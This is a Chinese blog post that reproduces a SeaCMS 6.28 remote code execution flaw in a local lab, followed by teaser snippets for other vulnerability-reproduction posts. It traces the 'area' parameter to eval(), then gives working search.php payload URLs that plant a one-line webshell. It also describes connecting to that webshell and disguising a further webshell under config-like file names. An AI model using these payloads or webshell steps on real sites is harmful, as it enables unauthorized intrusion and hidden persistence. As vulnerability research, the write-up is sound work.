漏洞复现海洋cms6.28远程代码执行(代码片段)

独角授 独角授     2022-12-07     359

关键词:

【漏洞复现】海洋CMS6.28远程代码执行

文章目录

一、漏洞背景

海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。

该CMS6.28版本存在命令执行漏洞,攻击者可以通过远程命令执行入侵被攻击者主机。

二、漏洞原理

area参数处理过的地方经过字符是否非法判断之后,调用echoSearchPage()函数

area参数经过了检测是否是拼音之后

接下来到了

$content=$mainClassObj->parseSearchItemList($content,"area");

因为能执行php代码一般就是eval()函数

搜索一下这个页面有eval函数的地方

for($m=0;$m<$arlen;$m++) $strIf=$iar[1][$m]; $strIf=$this->parseStrIf($strIf);
$strThen=$iar[2][$m];
$strThen=$this->parseSubIf($strThen);
 if (strpos($strThen,$labelRule2)===false)
 if (strpos($strThen,$labelRule3)>=0)
$elsearray=explode($labelRule3,$strThen);
$strThen1=$elsearray[0];
$strElse1=$elsearray[1];
 @eval("if(".$strIf.")\\$ifFlag=true;else\\$ifFlag=false;");
 if ($ifFlag) $content=str_replace($iar[0][$m],$strThen1,$content); else $content=str_replace($iar[0][$m],$strElse1,$content);
 else
 @eval("if(".$strIf.")  \\$ifFlag=true; else \\$ifFlag=false;");
 if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);
 

可以在这里下个断点,把变量打印出来

就可以清晰的看到就是在这执行了我们的命令

漏洞最终payload:/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

三、漏洞复现

本地IIS搭建CMS

构造payload:

先来个phpinfo

http://192.168.1.14:8452/search.php?searchtype=5&tid=&area=phpinfo()

代码执行成功

ok

继续一句话木马

http://192.168.1.14:8452/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

直接蚁剑链接,连接密码cmd

连接数据库

尝试蚁剑拿shell

无回显

到这儿就结束了吗?

不!再战

用蚁剑写个冰蝎的马试试

名字伪装一下,都懂的admin…config…ini…

尝试连接

shell还是不行

草草结束。

复现cve-2020-16898tcp/ip远程代码执行漏洞(代码片段)

...理ICMPv6RouterAdvertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6RouterAdvertisement数据包发送到远程Window 查看详情

ghostscript远程代码执行漏洞复现(代码片段)

这两天网上ghostscript又又有漏洞信息了,但是没有poc,于是找找资料把今年8月21日的那个验证下1、关于ghostscriptGhostscript是一套建基于Adobe、PostScript及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。最初是以商业... 查看详情

st2-057远程代码执行漏洞复现过程(代码片段)

0x01搭建环境dockerhttps://github.com/vulhub/vulhub/tree/master/struts2/s2-048docker-composeup-d 0x02搭建st2-057漏洞环境dockerexec-i-t88fd8d560155/bin/bash  后台启动进入docker 根据公告 https://struts.apache 查看详情

中间件漏洞汇总(代码片段)

目录一些地址什么是中间件iis6x篇PUT漏洞漏洞描述漏洞复现防御方式解析漏洞-基于文件名原理复现防御解析漏洞-基于文件夹原理复现防御IIS短文件漏洞介绍原理复现防御RCE-CVE-2017-7269介绍影响范围复现防御iis7x篇文件解析漏洞原... 查看详情

wordpresssocialwarfare组件远程代码漏洞执行详细复现(代码片段)

...天在知道创宇上发现3月26日提交WordPressXSS和远程代码执行漏洞,于是试着复现了下远程代码执行漏洞该漏洞源于SocialWarfare组件,并且版本<=3.5.2、且要是管理员登录状态,因此该漏洞是个后台代码执行漏洞报告https://www.webarxsecu... 查看详情

cve-2020-5902f5big-ip远程代码执行漏洞复现(代码片段)

CVE-2020-5902F5BIG-IP远程代码执行漏洞复现漏洞介绍F5BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。近日,F5官方公布流量管理用户界面(TMUI)使用程序的特定页面中存在一处... 查看详情

f5big-ip远程代码执行漏洞复现(cve-2020-5902)(代码片段)

0x01漏洞详情F5BIG-IP是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。2020年07月03日,360CERT监测发现F5发布了F5BIG-IP远程代码执行的风险通告,该漏洞编号为CVE-2020-5902,... 查看详情

windows漏洞:ms08-067远程代码执行漏洞复现及深度防御(代码片段)

摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程本文分享自华为云社区《Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御》,作者:eastmount。一.漏洞描述MS08-067漏洞全称是“WindowsServ... 查看详情

atlassianconfluence远程代码执行漏洞(cve-2022-26134)复现(代码片段)

...员之间共享信息、文档协作、集体讨论,信息推送。漏洞概述AtlassianConfluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。2022年6月2日,Atlassian发布安全公告,公布了一个ConfluenceServer和Da... 查看详情

thinkphp5.0.23远程代码执行漏洞(cve-2018-20062)漏洞复现(代码片段)

文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明漏洞名称ThinkPHP5.0.23远程代码执行漏洞漏洞编号CVE-2018-20062漏洞描述ThinkPHP是一款... 查看详情

用友nc6.5beanshell远程代码执行漏洞复现(cnvd-2021-30167)(代码片段)

...供参考,未经企业单位授权请勿非法测试!一、漏洞介绍1.1NC介绍  用友NCV6.5系统作为用友软件公司主打互联网平台型的ERP系统,致力于以混合云模式支撑大型企业的互联网化。面向集团企业的管理软件,同类... 查看详情

cve-2019-0232漏洞复现(代码片段)

记录一个cve-2019-0232的漏洞环境搭建的任务1、相关信息2019年4月11日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-2019-0232),由于JRE将命令行参数传递给Windows的方式存在错误,会导致CGIServlet受到远程执行... 查看详情

墨者靶场apachestruts2远程代码执行漏洞(s2-013)复现(代码片段)

漏洞详情:关于漏洞详情可以查看这篇文章:S2-013struts2的标签中<s:a>和<s:url>都有一个includeParams属性,可以设置成如下值:1.none-URL中不包含任何参数(默认)2.get-仅包含URL中的GET参数3.all-在URL中包... 查看详情

samba远程代码执行漏洞(cve-2017-7494)复现

  简要记录一下Samba远程代码执行漏洞(CVE-2017-7494)环境搭建和利用的过程,献给那些想自己动手搭建环境的朋友。(虽然已过多时)  快捷通道:Docker~Samba远程代码执行漏洞(CVE-2017-7494)  演   示:服务器版“永... 查看详情

mongo-express远程代码执行(cve-2019-10758)漏洞复现(msfvenom/wget,反弹shell)(代码片段)

...AdminWeb管理界面,基于NodeJS、Express、Bootstrap3开源编写漏洞介绍在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码复现环境mongo-express0.53.0M 查看详情

永恒之黑(cve-2020-0796微软smbv3协议远程代码执行漏洞)(代码片段)

文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现一、漏洞简介:3月12日,微软更新安全通告针对WindowsSMBv3客... 查看详情

永恒之黑(cve-2020-0796微软smbv3协议远程代码执行漏洞)(代码片段)

文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现一、漏洞简介:3月12日,微软更新安全通告针对WindowsSMBv3客... 查看详情

华为路由器远程命令执行漏洞复现(cve-2017-17215)(代码片段)

华为路由器远程命令执行漏洞复现(CVE-2017-17215)漏洞内容这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令远程命令执行漏洞,... 查看详情